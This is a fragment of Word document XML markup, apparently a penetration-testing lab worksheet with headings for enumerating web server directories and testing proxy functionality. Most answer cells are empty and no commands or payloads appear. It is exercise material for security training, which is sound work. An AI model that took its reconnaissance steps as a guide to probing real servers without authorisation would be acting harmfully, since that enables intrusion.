              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="590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3370" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74364D52" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00A61C63">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="560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</w:tr>
      <w:tr w:rsidR="00A61C63" w:rsidRPr="00A61C63" w14:paraId="1C68A6BA" w14:textId="77777777" w:rsidTr="0085194C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D0CF815" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="590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3631" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75963EA7" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00A61C63">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="590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3370" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FEE84C8" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00A61C63">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="560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</w:tr>
      <w:tr w:rsidR="00A61C63" w:rsidRPr="00A61C63" w14:paraId="58BD16D3" w14:textId="77777777" w:rsidTr="00A7767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0B82103" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00A7767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61C63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Tools/Services Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7001" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02D72ECF" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27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42B6FF4" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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1729252" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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3644ADB" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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99858B9" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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4908EA5" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00A61C6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507B6D81" w14:textId="77777777" w:rsidR="00B57843" w:rsidRPr="00A51A96" w:rsidRDefault="00B57843" w:rsidP="00B5784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7843" w14:paraId="67545893" w14:textId="77777777" w:rsidTr="00AB09A4">
        <w:trPr>
          <w:trHeight w:val="2717"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A24DEEF" w14:textId="77777777" w:rsidR="00B57843" w:rsidRDefault="00B57843" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="63892DF8" w14:textId="77777777" w:rsidR="00B57843" w:rsidRDefault="00B57843" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="20B5774F" w14:textId="77777777" w:rsidR="00B57843" w:rsidRDefault="00B57843" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6CAEE0F9" w14:textId="77777777" w:rsidR="00B57843" w:rsidRDefault="00B57843" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0BF9910B" w14:textId="77777777" w:rsidR="00B57843" w:rsidRDefault="00B57843" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="003E0BB9" w14:textId="77777777" w:rsidR="00B57843" w:rsidRDefault="00B57843" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2883890B" w14:textId="77777777" w:rsidR="005B0B5A" w:rsidRDefault="005B0B5A" w:rsidP="000947B4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8D2BAC" w:rsidRPr="000F3EF2" w14:paraId="7F6DF562" w14:textId="77777777" w:rsidTr="00581956">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3BF6A03C" w14:textId="63F51FF1" w:rsidR="008D2BAC" w:rsidRPr="000F3EF2" w:rsidRDefault="008D2BAC" w:rsidP="008519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1.18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6A78BB" w:rsidRPr="006A78BB">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Enumerate Webserver Directories</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="382953CB" w14:textId="77777777" w:rsidR="008D2BAC" w:rsidRPr="00AB09A4" w:rsidRDefault="008D2BAC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BF11F5" w:rsidRPr="00BF11F5" w14:paraId="7CE480BA" w14:textId="77777777" w:rsidTr="00F23EE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3DC88AC" w14:textId="77777777" w:rsidR="00BF11F5" w:rsidRPr="00BF11F5" w:rsidRDefault="00BF11F5" w:rsidP="00F23EE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F11F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3E73D5F9" w14:textId="77777777" w:rsidR="00BF11F5" w:rsidRPr="00BF11F5" w:rsidRDefault="00BF11F5" w:rsidP="00BF11F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F11F5" w:rsidRPr="00BF11F5" w14:paraId="6216075D" w14:textId="77777777" w:rsidTr="00F23EE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52B6684" w14:textId="77777777" w:rsidR="00BF11F5" w:rsidRPr="00BF11F5" w:rsidRDefault="00BF11F5" w:rsidP="00F23EE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F11F5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4D08B509" w14:textId="77777777" w:rsidR="00BF11F5" w:rsidRPr="00BF11F5" w:rsidRDefault="00BF11F5" w:rsidP="00BF11F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F11F5" w:rsidRPr="00BF11F5" w14:paraId="3A016443" w14:textId="77777777" w:rsidTr="00F23EE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225669C" w14:textId="77777777" w:rsidR="00BF11F5" w:rsidRPr="00BF11F5" w:rsidRDefault="00BF11F5" w:rsidP="00F23EE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F11F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shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FDE30C2" w14:textId="77777777" w:rsidR="00BF11F5" w:rsidRPr="00BF11F5" w:rsidRDefault="00BF11F5" w:rsidP="00BF11F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F11F5" w:rsidRPr="00BF11F5" w14:paraId="0720831D" w14:textId="77777777" w:rsidTr="00F23EE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2702A64" w14:textId="77777777" w:rsidR="00BF11F5" w:rsidRPr="00BF11F5" w:rsidRDefault="00BF11F5" w:rsidP="00F23EE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F11F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server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0417262F" w14:textId="77777777" w:rsidR="00BF11F5" w:rsidRPr="00BF11F5" w:rsidRDefault="00BF11F5" w:rsidP="00BF11F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F11F5" w:rsidRPr="00BF11F5" w14:paraId="3C45A8CE" w14:textId="77777777" w:rsidTr="00F23EEB">
        <w:trPr>
          <w:trHeight w:val="1493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5529F32" w14:textId="77777777" w:rsidR="00BF11F5" w:rsidRPr="00BF11F5" w:rsidRDefault="00BF11F5" w:rsidP="00F23EE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F11F5">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Commands Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DB1E25B" w14:textId="77777777" w:rsidR="00BF11F5" w:rsidRPr="00BF11F5" w:rsidRDefault="00BF11F5" w:rsidP="00BF11F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F11F5" w:rsidRPr="00BF11F5" w14:paraId="1BD144C2" w14:textId="77777777" w:rsidTr="00F23EE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769C851" w14:textId="77777777" w:rsidR="00BF11F5" w:rsidRPr="00BF11F5" w:rsidRDefault="00BF11F5" w:rsidP="00F23EE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F11F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List of Interesting Files and Folders </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1036B155" w14:textId="77777777" w:rsidR="00BF11F5" w:rsidRPr="00BF11F5" w:rsidRDefault="00BF11F5" w:rsidP="00843567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D3DBE8E" w14:textId="77777777" w:rsidR="00BF11F5" w:rsidRPr="00BF11F5" w:rsidRDefault="00BF11F5" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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4C41BA9" w14:textId="77777777" w:rsidR="00BF11F5" w:rsidRPr="00BF11F5" w:rsidRDefault="00BF11F5" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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2660693" w14:textId="77777777" w:rsidR="00BF11F5" w:rsidRPr="00BF11F5" w:rsidRDefault="00BF11F5" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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F1709A0" w14:textId="77777777" w:rsidR="00BF11F5" w:rsidRPr="00BF11F5" w:rsidRDefault="00BF11F5" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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1D8F8E6" w14:textId="77777777" w:rsidR="00BF11F5" w:rsidRPr="00BF11F5" w:rsidRDefault="00BF11F5" w:rsidP="00BF11F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F11F5" w:rsidRPr="00BF11F5" w14:paraId="735551CE" w14:textId="77777777" w:rsidTr="00F23EE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647789B" w14:textId="77777777" w:rsidR="00BF11F5" w:rsidRPr="00BF11F5" w:rsidRDefault="00BF11F5" w:rsidP="00F23EE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F11F5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3EEA99A4" w14:textId="77777777" w:rsidR="00BF11F5" w:rsidRPr="00BF11F5" w:rsidRDefault="00BF11F5" w:rsidP="00843567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914FF6B" w14:textId="77777777" w:rsidR="00BF11F5" w:rsidRPr="00BF11F5" w:rsidRDefault="00BF11F5" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29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59799B7" w14:textId="77777777" w:rsidR="00BF11F5" w:rsidRPr="00BF11F5" w:rsidRDefault="00BF11F5" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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3F0E642" w14:textId="77777777" w:rsidR="00BF11F5" w:rsidRPr="00BF11F5" w:rsidRDefault="00BF11F5" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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BBE5795" w14:textId="77777777" w:rsidR="00BF11F5" w:rsidRPr="00BF11F5" w:rsidRDefault="00BF11F5" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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032AE4B" w14:textId="77777777" w:rsidR="00BF11F5" w:rsidRPr="00BF11F5" w:rsidRDefault="00BF11F5" w:rsidP="00BF11F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3593052E" w14:textId="77777777" w:rsidR="006B5767" w:rsidRPr="00A51A96" w:rsidRDefault="006B5767" w:rsidP="006B5767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B5767" w14:paraId="48B76A5A" w14:textId="77777777" w:rsidTr="0085194C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="643A868F" w14:textId="77777777" w:rsidR="006B5767" w:rsidRDefault="006B5767" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3448F56A" w14:textId="77777777" w:rsidR="006B5767" w:rsidRDefault="006B5767" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6DFBB8B3" w14:textId="77777777" w:rsidR="006B5767" w:rsidRDefault="006B5767" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6CE99905" w14:textId="77777777" w:rsidR="006B5767" w:rsidRDefault="006B5767" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="58A04788" w14:textId="77777777" w:rsidR="006B5767" w:rsidRDefault="006B5767" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="17E509D8" w14:textId="77777777" w:rsidR="006B5767" w:rsidRDefault="006B5767" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="554F5B58" w14:textId="77777777" w:rsidR="006A78BB" w:rsidRDefault="006A78BB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6B5767" w:rsidRPr="000F3EF2" w14:paraId="4667D5D7" w14:textId="77777777" w:rsidTr="00D06594">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0C94E026" w14:textId="097D5ED1" w:rsidR="006B5767" w:rsidRPr="000F3EF2" w:rsidRDefault="006B5767" w:rsidP="008519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1.19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202FFE" w:rsidRPr="00202FFE">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Test for Proxy Functionality</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="57B6B904" w14:textId="77777777" w:rsidR="006B5767" w:rsidRPr="00F3173E" w:rsidRDefault="006B5767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181"/>
        <w:gridCol w:w="3825"/>
      </w:tblGrid>
      <w:tr w:rsidR="00411CEF" w:rsidRPr="00411CEF" w14:paraId="5C6FA7C9" w14:textId="77777777" w:rsidTr="00F3173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2C77266" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00F3173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11CEF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87C87B8" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00411CE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11CEF" w:rsidRPr="00411CEF" w14:paraId="46BFD616" w14:textId="77777777" w:rsidTr="00F3173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284B34B" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00F3173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11CEF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7DF25F3" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00411CE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11CEF" w:rsidRPr="00411CEF" w14:paraId="4695784B" w14:textId="77777777" w:rsidTr="00F3173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884D8BE" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00F3173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11CEF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B7BC731" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00411CE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11CEF" w:rsidRPr="00411CEF" w14:paraId="2C5A9F1F" w14:textId="77777777" w:rsidTr="00F3173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F34B8C0" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00F3173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11CEF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Server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4A07FFB" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00411CE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11CEF" w:rsidRPr="00411CEF" w14:paraId="177E3B82" w14:textId="77777777" w:rsidTr="00F3173E">
        <w:trPr>
          <w:trHeight w:val="1313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B97210F" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00F3173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11CEF">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Commands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FDC0A26" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00411CE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C33B0" w:rsidRPr="00411CEF" w14:paraId="4198B553" w14:textId="77777777" w:rsidTr="00F3173E">
        <w:trPr>
          <w:trHeight w:val="1313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47621E7" w14:textId="1EBAE448" w:rsidR="000C33B0" w:rsidRPr="00411CEF" w:rsidRDefault="000C33B0" w:rsidP="00F3173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Techniques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2FF9235" w14:textId="77777777" w:rsidR="000C33B0" w:rsidRPr="00411CEF" w:rsidRDefault="000C33B0" w:rsidP="00411CE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11CEF" w:rsidRPr="00411CEF" w14:paraId="5C1098AB" w14:textId="77777777" w:rsidTr="00F3173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0BDACB0" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00F3173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11CEF">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Does the Target Web Server can Act as a Proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="318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796BA32" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00411CEF">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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411CEF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82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C71FD56" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00411CEF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411CEF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411CEF" w:rsidRPr="00411CEF" w14:paraId="1F67C1CB" w14:textId="77777777" w:rsidTr="00F3173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3BDBC74" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00F3173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11CEF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Checked </w:t>
            </w:r>
            <w:r w:rsidRPr="00411CEF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HTTP Requests</w:t>
            </w:r>
            <w:r w:rsidRPr="00411CEF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that </w:t>
            </w:r>
            <w:r w:rsidRPr="00411CEF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Maneuver Web Servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="318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0F369F0" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00411CEF">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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411CEF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="382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533CDB7" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00411CEF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411CEF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411CEF" w:rsidRPr="00411CEF" w14:paraId="4D32E653" w14:textId="77777777" w:rsidTr="00F3173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A825A31" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00F3173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11CEF">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Information Retrieved from the Server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5CAF4A7" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00843567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6185EE4" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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FFD41D3" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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1D2EBD5" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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3AE1C5A" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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9827798" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00411CE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11CEF" w:rsidRPr="00411CEF" w14:paraId="4A8EF3BB" w14:textId="77777777" w:rsidTr="00F3173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4BACB68" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00F3173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11CEF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Common Port Numbers to which </w:t>
            </w:r>
            <w:r w:rsidRPr="00411CEF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>HTTP Requests Connect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D1A12AB" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00843567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C4B2BAB" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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AD74193" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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EFB6105" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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CC5D4A3" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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C7B2031" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00411CE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11CEF" w:rsidRPr="00411CEF" w14:paraId="7A9F9BCA" w14:textId="77777777" w:rsidTr="00F3173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929378E" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00F3173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11CEF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D452EA1" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00843567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21AD3D9" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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A3DDAF7" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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205F2E0" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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943373E" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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2AB2463" w14:textId="77777777" w:rsidR="00411CEF" w:rsidRPr="00411CEF" w:rsidRDefault="00411CEF" w:rsidP="00411CE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0DCD5CBD" w14:textId="77777777" w:rsidR="00BA0153" w:rsidRPr="00A51A96" w:rsidRDefault="00BA0153" w:rsidP="00BA015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0153" w14:paraId="56276903" w14:textId="77777777" w:rsidTr="0085194C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A6B779C" w14:textId="77777777" w:rsidR="00BA0153" w:rsidRDefault="00BA0153" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="27D850F3" w14:textId="77777777" w:rsidR="00BA0153" w:rsidRDefault="00BA0153" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="30A63360" w14:textId="77777777" w:rsidR="00BA0153" w:rsidRDefault="00BA0153" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="730DAD15" w14:textId="77777777" w:rsidR="00BA0153" w:rsidRDefault="00BA0153" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="239E0F67" w14:textId="77777777" w:rsidR="0082159E" w:rsidRDefault="0082159E" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7E8E5698" w14:textId="77777777" w:rsidR="0082159E" w:rsidRDefault="0082159E" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6624CF0B" w14:textId="77777777" w:rsidR="0082159E" w:rsidRDefault="0082159E" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6EB5FC35" w14:textId="77777777" w:rsidR="00BA0153" w:rsidRDefault="00BA0153" w:rsidP="0085194C">
            <w:pPr>
